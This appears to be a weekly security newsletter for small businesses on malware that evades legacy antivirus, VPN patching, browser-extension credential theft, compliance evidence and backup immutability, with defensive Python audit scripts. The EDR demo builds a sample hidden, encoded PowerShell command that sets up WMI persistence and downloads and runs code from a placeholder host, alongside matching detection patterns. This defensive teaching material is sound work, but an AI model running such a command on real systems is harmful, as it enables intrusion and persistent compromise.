This Week's Cyber Pulse — April 21, 2026

Your weekly intelligence brief for small and mid-size businesses. Sourced, rated, and written in plain English.


Threat Roundup

🔴 HIGH SEVERITY: Living-off-the-Land Malware Slipping Past Legacy AV at SMBs Without EDR

A new strain of commodity malware specifically designed to evade legacy antivirus (AV) tools is spreading via malicious email attachments. Named "SilverSlip" by threat intelligence firms, it uses living-off-the-land (LOTL) techniques — abusing legitimate Windows tools like PowerShell and WMI — to establish persistence without dropping traditional malicious executables.

Signature-based AV (the built-in Windows Defender antivirus without a Defender for Business or Defender for Endpoint license, older Symantec/McAfee deployments) is not catching this variant reliably: there is no dropped file to match, only signed Windows binaries doing unusual things. Endpoint Detection and Response (EDR) products with behavioral analysis are detecting and blocking it on that activity.

Why this matters now: This is the exact threat pattern driving cyber insurers to require EDR. If you're using legacy AV only, you're exposed and likely uninsurable at standard rates.

What to do:

  • Evaluate EDR solutions: CrowdStrike Falcon Go (SMB-tier), SentinelOne, or Microsoft Defender for Business (included in Microsoft 365 Business Premium)

  • Microsoft Defender for Business costs ~$3/user/month as a standalone add-on (it is already included in Business Premium) and adds the behavioral detection, investigation and response features that the free built-in Defender antivirus lacks

  • Prioritize EDR on the endpoints that read email and browse the web (the initial access path for this campaign is an attachment) and on anything with access to financial systems, then extend it to every device; an uncovered laptop is still a foothold

Severity: High | Affected: SMBs running legacy AV | Source: Sophos X-Ops, Secureworks CTU Research


🟡 MEDIUM SEVERITY: VPN Vulnerabilities Still Unpatched at Thousands of SMBs

Ivanti Connect Secure and Palo Alto Networks GlobalProtect VPN vulnerabilities disclosed in early 2026 remain unpatched at a significant percentage of SMB deployments. CISA has added both to its Known Exploited Vulnerabilities (KEV) catalog, which means exploitation in the wild is confirmed, not theoretical. KEV listing sets a remediation deadline for US federal agencies; for everyone else it is the shortlist of what to patch first.

What to do:

  • If you use either product, confirm the appliance is running a fixed version from the vendor's advisory and patch immediately; a device that was exposed while exploitation was underway should also be checked for signs of compromise, because patching closes the door but does not evict anyone already inside

  • If you're unsure what VPN software you use, contact your IT provider today

  • Consider replacing legacy hardware VPN with zero-trust network access (ZTNA) solutions for better security and lower maintenance overhead

Severity: Medium | Affected: SMBs using Ivanti or Palo Alto VPN | Source: CISA KEV Catalog, April 2026


🟢 LOW SEVERITY: Browser Extension Credential Theft Campaign

A campaign targeting Chrome and Edge users is stealing credentials saved in business browsers. The attackers distribute malicious extensions via compromised developer accounts in the Chrome Web Store, which lets them push a malicious update to an extension users already trust. Because extensions update silently, an extension that was clean when installed can turn malicious later, so a one-time review is not enough.

What to do:

  • Audit browser extensions across company devices (Chrome: chrome://extensions, Edge: edge://extensions); on managed devices, enforce the ExtensionInstallAllowlist and ExtensionInstallBlocklist browser policies so only vetted extension IDs can be installed

  • Remove extensions not actively needed

  • Move employees to a dedicated password manager (Bitwarden, 1Password) and turn off the browser's own credential store with the PasswordManagerEnabled policy, so the browser is not holding a ready-made credential database for a rogue extension to read

Severity: Low | Affected: All businesses | Source: Extension Total, SANS Internet Storm Center
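One way to do the audit bullet at scale, as an added example for this brief (not a tool from Extension Total or SANS): the Python below walks the Chrome and Edge profile directories, reads each installed extension's manifest.json, resolves localized names, and flags extensions that are not on an allowlist or that request the permissions a credential-stealing extension needs (broad host access, cookies, webRequest). The profile paths are the browsers' documented defaults; the extension IDs, names and allowlist used in demo() are constructed.

```python
"""Inventory Chrome/Edge extensions from on-disk manifests and flag the risky
ones (added example for this brief; IDs, names and allowlist are constructed)."""
import json
import os
import sys
import tempfile
from pathlib import Path

# Per-user profile roots. Extensions unpack to
# <root>/<Profile>/Extensions/<32-char id>/<version>/manifest.json
def browser_roots() -> list:
    home = Path.home()
    if sys.platform.startswith("win"):
        local = Path(os.environ.get("LOCALAPPDATA", str(home / "AppData" / "Local")))
        return [local / "Google" / "Chrome" / "User Data",
                local / "Microsoft" / "Edge" / "User Data"]
    if sys.platform == "darwin":
        return [home / "Library" / "Application Support" / "Google" / "Chrome",
                home / "Library" / "Application Support" / "Microsoft Edge"]
    return [home / ".config" / "google-chrome", home / ".config" / "microsoft-edge"]

# API permissions that let an extension read credentials, sessions or every page.
HIGH_RISK_APIS = {"cookies", "webRequest", "webRequestBlocking", "debugger",
                  "clipboardRead", "nativeMessaging", "proxy", "scripting", "history"}

def is_broad_host(pattern: str) -> bool:
    """<all_urls> or a wildcard-host match pattern covers every site the user logs into."""
    return pattern == "<all_urls>" or pattern.split("://", 1)[-1].startswith("*/")

def risky_permissions(manifest: dict) -> list:
    """Gather API permissions, MV3 host_permissions and content-script match patterns."""
    requested = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    for script in manifest.get("content_scripts", []):
        requested |= set(script.get("matches", []))
    return sorted(p for p in requested if p in HIGH_RISK_APIS or is_broad_host(p))

def display_name(manifest: dict, version_dir: Path) -> str:
    """Resolve localized names (__MSG_key__) from _locales/<default_locale>/messages.json."""
    name = manifest.get("name", "")
    if name.startswith("__MSG_") and name.endswith("__"):
        messages = version_dir / "_locales" / manifest.get("default_locale", "en") / "messages.json"
        try:
            return json.loads(messages.read_text(encoding="utf-8"))[name[6:-2]]["message"]
        except (OSError, ValueError, KeyError):
            pass
    return name

def audit_root(root: Path, allowlist: set) -> list:
    """One record per installed extension version. This is on-disk presence, so
    disabled extensions appear too: treat the output as an inventory."""
    records = []
    for manifest_path in sorted(root.glob("*/Extensions/*/*/manifest.json")):
        try:
            manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        ext_id = manifest_path.parents[1].name
        flagged = risky_permissions(manifest)
        records.append({"profile": manifest_path.parents[3].name, "id": ext_id,
                        "name": display_name(manifest, manifest_path.parent),
                        "version": manifest.get("version", "?"), "flagged": flagged,
                        "allowlisted": ext_id in allowlist,
                        "needs_review": ext_id not in allowlist or bool(flagged)})
    return records

# Constructed IDs (real IDs are 32 letters a-p) and an allowlist for a stand-alone run.
SAFE_ID = "abcdefghijklmnopabcdefghijklmnop"
SUSPECT_ID = "ponmlkjihgfedcbaponmlkjihgfedcba"
ALLOWLIST = {SAFE_ID}

def _write(path: Path, obj: dict) -> None:
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(json.dumps(obj), encoding="utf-8")

def demo() -> list:
    """Build a constructed profile in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "User Data"
        safe = root / "Default" / "Extensions" / SAFE_ID / "2.1.0_0"
        _write(safe / "manifest.json", {"manifest_version": 3, "name": "__MSG_appName__",
                                        "default_locale": "en", "version": "2.1.0",
                                        "permissions": ["storage"]})
        _write(safe / "_locales" / "en" / "messages.json",
               {"appName": {"message": "Constructed Safe Notes"}})
        bad = root / "Default" / "Extensions" / SUSPECT_ID / "1.0.3_0"
        _write(bad / "manifest.json", {"manifest_version": 3, "name": "Constructed PDF Helper",
                                       "version": "1.0.3",
                                       "permissions": ["cookies", "webRequest", "storage"],
                                       "host_permissions": ["<all_urls>"],
                                       "content_scripts": [{"matches": ["https://*/*"],
                                                            "js": ["inject.js"]}]})
        return audit_root(root, ALLOWLIST)

if __name__ == "__main__":
    for root in browser_roots():
        for record in audit_root(root, ALLOWLIST):
            print(record)
```

Run audit_root() over every path from browser_roots() on each device (from a login script or an RMM job) and collect the output centrally. Any ID not on your allowlist, and any flagged permission set, is something to remove or to justify in writing. Once the allowlist is settled, enforce it with the browsers' ExtensionInstallAllowlist policy so the audit stays clean instead of being repeated by hand.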


Compliance Deadline Watch

SOC 2 Evidence Collection — What to Capture Monthly

SOC 2 Type II audits cover a 6-12 month observation period. Companies preparing for SOC 2 now should be actively collecting evidence every month, not scrambling at audit time.

What to collect monthly:

  • User access reviews (who has access to what systems — screenshot or export)

  • Security patching records (what patches were applied, when)

  • Vulnerability scan results (even free tools like OpenVAS or Qualys Community Edition count)

  • Incident log entries (even if nothing happened — "no incidents this period" is valid evidence)

  • Vendor security review notes (did you review any new vendor's security posture?)

CyberStackHub's SOC 2 Compliance Checker helps you track which controls you have evidence for and which are still gaps.

HIPAA Annual Risk Analysis Reminder

If you're a covered entity or business associate under HIPAA, the Security Rule's risk analysis is required, not optional, and it has to be kept current. Many covered entities treat it as a one-time event. Performing it annually is the accepted baseline, and it must also be redone after any significant change to your environment (new system, new vendor, cloud migration).

Use CyberStackHub's Risk Assessment Tool as a starting point, then document your methodology and findings.


Insurance Market Update

The market is moving fast: EDR is now a hard requirement at Chubb, AIG, and Hartford for any SMB with more than 50 employees or more than $5M in revenue. Carriers are also starting to require backup immutability (backups that cannot be deleted or modified by ransomware) as a condition of coverage.

If your backup software runs with credentials that can delete or overwrite its own backups, and those credentials live on an agent or server on the same network as your primary systems, the backups are not immutable: ransomware that reaches the backup server deletes them first. Immutability means the storage layer itself refuses deletion and modification until a retention period expires, no matter who asks. Cloud-native backup services (Backblaze Business, Veeam Cloud Connect, Druva) can provide this, but check that the retention lock is actually enabled and set in a mode the backup account cannot override; an unlocked cloud bucket is just an off-site copy.
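How to verify the "cannot be deleted or modified" claim from the storage API rather than from a product sheet, as an added example for this brief (not vendor code): the Python below evaluates the two responses the S3 API returns for a bucket (get-bucket-versioning and get-object-lock-configuration) and only calls the target immutable when versioning is on, Object Lock is enabled, the default retention is in COMPLIANCE mode rather than GOVERNANCE (which a sufficiently privileged principal can bypass), and the retention period covers the required window. A per-object check on head-object output is included for backup products that set retention on each object instead of relying on a bucket default. The bucket names, configurations and dates are constructed; the same response shapes apply to S3-compatible object stores that implement Object Lock.

```python
"""Judge whether an object-storage backup target is really immutable from the
S3 API's own answers (added example for this brief; all bucket data is constructed)."""
from datetime import datetime, timezone
from typing import Optional

# Inputs are the JSON bodies of
#   aws s3api get-bucket-versioning --bucket NAME
#   aws s3api get-object-lock-configuration --bucket NAME   (fails with
#   ObjectLockConfigurationNotFoundError when Lock was never enabled; pass None)
#   aws s3api head-object --bucket NAME --key KEY            (per-object retention)

def evaluate_bucket(versioning: dict, lock: Optional[dict], required_days: int) -> dict:
    """Bucket-level verdict: {"immutable": bool, "reasons": [why not]}."""
    reasons = []
    if versioning.get("Status") != "Enabled":
        reasons.append("versioning is off: an overwrite or delete destroys the only copy")
    cfg = (lock or {}).get("ObjectLockConfiguration", {})
    if cfg.get("ObjectLockEnabled") != "Enabled":
        reasons.append("Object Lock is not enabled on the bucket")
        return {"immutable": False, "reasons": reasons}
    retention = cfg.get("Rule", {}).get("DefaultRetention")
    if not retention:
        # Some backup products set retention per object instead; the bucket
        # config then proves nothing and object_is_locked() must be run.
        reasons.append("no default retention: immutability depends on per-object "
                       "retention set by the backup software, verify with head-object")
        return {"immutable": False, "reasons": reasons}
    mode = retention.get("Mode")
    if mode != "COMPLIANCE":
        reasons.append(f"retention mode is {mode}: GOVERNANCE can be lifted by any principal "
                       "holding s3:BypassGovernanceRetention, which a stolen backup key may have")
    days = retention.get("Days", 0) + 365 * retention.get("Years", 0)
    if days < required_days:
        reasons.append(f"default retention is {days} days, below the required {required_days}")
    # Default retention only applies to objects written after it was set;
    # backups taken earlier stay deletable unless locked individually.
    return {"immutable": not reasons, "reasons": reasons}

def object_is_locked(head: dict, required_until: datetime) -> bool:
    """Per-object check from head-object: COMPLIANCE retention past the required date.
    Legal holds are ignored on purpose: anyone with s3:PutObjectLegalHold can remove them."""
    until = head.get("ObjectLockRetainUntilDate")
    return head.get("ObjectLockMode") == "COMPLIANCE" and until is not None and until >= required_until

def audit_buckets(buckets: dict, required_days: int = 30) -> dict:
    return {name: evaluate_bucket(v, lock, required_days) for name, (v, lock) in buckets.items()}

def _lock_cfg(mode: str, days: int) -> dict:
    return {"ObjectLockConfiguration": {"ObjectLockEnabled": "Enabled",
                                        "Rule": {"DefaultRetention": {"Mode": mode, "Days": days}}}}

# Constructed buckets: one genuinely immutable, one bypassable, one too short, one plain.
SAMPLE_BUCKETS = {
    "backups-compliance-30d": ({"Status": "Enabled"}, _lock_cfg("COMPLIANCE", 30)),
    "backups-governance-30d": ({"Status": "Enabled"}, _lock_cfg("GOVERNANCE", 30)),
    "backups-compliance-7d": ({"Status": "Enabled"}, _lock_cfg("COMPLIANCE", 7)),
    "backups-plain": ({"Status": "Suspended"}, None),
}

# Constructed head-object results, judged against a required hold date.
REQUIRED_UNTIL = datetime(2026, 5, 21, tzinfo=timezone.utc)
LOCKED_HEAD = {"ObjectLockMode": "COMPLIANCE",
               "ObjectLockRetainUntilDate": datetime(2026, 6, 1, tzinfo=timezone.utc)}
GOVERNANCE_HEAD = {"ObjectLockMode": "GOVERNANCE",
                   "ObjectLockRetainUntilDate": datetime(2026, 6, 1, tzinfo=timezone.utc)}
UNLOCKED_HEAD = {}

if __name__ == "__main__":
    for name, verdict in audit_buckets(SAMPLE_BUCKETS).items():
        print(name, "IMMUTABLE" if verdict["immutable"] else "NOT immutable", verdict["reasons"])
    print(object_is_locked(LOCKED_HEAD, REQUIRED_UNTIL), object_is_locked(GOVERNANCE_HEAD, REQUIRED_UNTIL))
```

Run both checks against the bucket your backup software actually writes to, using the credentials the software itself uses. If those credentials can permanently delete a locked object version, the target is not immutable, whatever the console says.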


Tool Spotlight: Cyber Insurance Readiness Checker

This week: our Cyber Insurance Readiness Tool — maps your current security controls to what insurers actually require during underwriting. It tells you exactly which gaps are likely to increase your premium or trigger a coverage denial.

Given this week's news about EDR becoming a hard requirement, the readiness checker will flag your endpoint protection status immediately.

Check your insurance readiness free


Run The Cyber Pulse Stack — Free

Get a personalized security brief covering threats relevant to your industry, compliance deadlines you're facing, and your insurance readiness score — delivered to your inbox, phone, or as a downloadable PDF.

Run The Cyber Pulse Stack free


Frequently Asked Questions

What is EDR and how is it different from antivirus?
Antivirus detects known malware signatures — it matches files against a database of known threats. EDR (Endpoint Detection and Response) monitors behavior in real-time — it detects suspicious actions like unusual PowerShell execution or lateral movement, even from zero-day threats with no known signature. EDR is significantly more effective against modern attacks.
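The SilverSlip item in the Threat Roundup and this answer make the same point: a file-hash lookup has nothing to match when the "malware" is the signed powershell.exe. The Python below is an added example for this brief, not code from the page's sources or from any EDR vendor. It runs a signature check and a handful of behavioral rules (an Office application spawning a script host, -EncodedCommand payloads decoded and inspected, download cradles, WMI permanent-event-subscription persistence, hidden-window and execution-policy-bypass flags) over three constructed process-creation events. The hashes, hostnames, paths and the 203.0.113.7 URL are constructed placeholders, and the rules are generic living-off-the-land indicators, not SilverSlip indicators of compromise.

```python
"""Signature-only vs behavior-based detection over constructed process-creation
events (added example for this brief; hashes, hosts and the URL are placeholders)."""
import base64
import hashlib
import re
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class ProcessEvent:
    """Fields a Security 4688 / Sysmon Event 1 record gives an endpoint sensor."""
    host: str
    parent_image: str
    image: str
    command_line: str
    image_sha256: str

# Constructed stand-ins. A signature database knows the dropped .exe; it has no
# entry for the Microsoft-signed powershell.exe that LOTL malware abuses.
FAKE_DROPPER_HASH = hashlib.sha256(b"constructed dropper bytes").hexdigest()
LEGIT_POWERSHELL_HASH = hashlib.sha256(b"constructed stand-in for signed powershell.exe").hexdigest()
SIGNATURE_DB = {FAKE_DROPPER_HASH: "Trojan.Generic.Constructed"}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "wmic.exe"}
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
CRADLE = re.compile(r"(?i)iex|invoke-expression|downloadstring|downloadfile|invoke-webrequest|net\.webclient")
WMI_PERSIST = re.compile(r"(?i)__eventfilter|commandlineeventconsumer|__filtertoconsumerbinding|"
                         r"register-wmievent|root[/\\]subscription")
STEALTH = re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden|(?:^|\s)-(?:nop|noprofile)\b|"
                     r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass")

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def signature_verdict(ev: ProcessEvent) -> Optional[str]:
    """Legacy AV model: the file hash is on the known-bad list or the file is 'clean'."""
    return SIGNATURE_DB.get(ev.image_sha256.lower())

def expand_encoded(cmd: str) -> str:
    """Append the decoded -EncodedCommand payload (base64 of UTF-16LE) so rules can see it."""
    m = ENCODED_FLAG.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd + " <decoded> " + decoded

def behavior_findings(ev: ProcessEvent) -> list:
    """EDR model: judge what the process does and who launched it, not what file it is."""
    findings = []
    child, parent = basename(ev.image), basename(ev.parent_image)
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        findings.append("office-app-spawned-script-host")
    if child in SCRIPT_HOSTS:
        cmd = expand_encoded(ev.command_line)
        if cmd != ev.command_line:
            findings.append("encoded-command")
        if CRADLE.search(cmd):
            findings.append("download-cradle")
        if WMI_PERSIST.search(cmd):
            findings.append("wmi-event-subscription-persistence")
        if STEALTH.search(cmd):
            findings.append("hidden-window-or-policy-bypass")
    return findings

def triage(events) -> list:
    """Run both models on each event; two or more behaviors is the block threshold used here."""
    results = []
    for ev in events:
        beh = behavior_findings(ev)
        results.append({"host": ev.host, "image": basename(ev.image),
                        "signature": signature_verdict(ev), "behaviors": beh,
                        "edr_action": "block" if len(beh) >= 2 else "review" if beh else "allow"})
    return results

def encode_ps(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample events. Event 1 is the pattern from the roundup item: Word,
# opened from an email attachment, spawns hidden encoded PowerShell that registers
# a WMI permanent event subscription and pulls a second stage from a test-net URL.
WMI_PERSIST_SCRIPT = (
    "Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments "
    "@{Name='upd';EventNamespace='root/cimv2';QueryLanguage='WQL';Query='SELECT * FROM "
    "__InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA ''Win32_LocalTime'''}; "
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s')")
SAMPLE_EVENTS = [
    ProcessEvent("PC-ACCT-01", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc " + encode_ps(WMI_PERSIST_SCRIPT), LEGIT_POWERSHELL_HASH),
    ProcessEvent("PC-IT-02", r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe Get-Service | Where-Object Status -eq Running", LEGIT_POWERSHELL_HASH),
    ProcessEvent("PC-ACCT-01", r"C:\Windows\explorer.exe",
                 r"C:\Users\jdoe\Downloads\invoice.exe", "invoice.exe", FAKE_DROPPER_HASH),
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(result)
```

The thresholds and rule set are illustrative; a real EDR weighs far more signals and correlates them across processes and hosts. The point the sample makes is the one the answer above makes: event 1 is a signed Microsoft binary with a clean hash, so the signature model returns nothing, while the behavioral model flags it five ways, and the ordinary admin PowerShell in event 2 stays clean under both.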

Which EDR solution is best for a small business?
Microsoft Defender for Business (included in Microsoft 365 Business Premium at ~$22/user/month) is the most cost-effective entry point for most SMBs already on Microsoft 365. For more advanced needs, CrowdStrike Falcon Go and SentinelOne offer SMB-tier pricing. The key is behavior-based detection, not just signature-based scanning.

Will my cyber insurance premium go up if I don't have EDR?
Most likely, yes. At insurers requiring EDR, not having it can result in premium increases of 20–40%, reduced coverage limits, or policy denial. The incremental cost of EDR (often $3–10/user/month) is almost always less than the insurance impact of not having it.

What does SOC 2 Type II actually cover?
SOC 2 Type II is an audit of your security controls over a 6-12 month observation period. It covers five Trust Service Criteria: Security (required), plus optional Availability, Confidentiality, Processing Integrity, and Privacy. The Type II (vs. Type I) distinction means auditors verified the controls operated continuously over time, not just existed on paper.


More editions: This Week's Cyber Pulse Archive
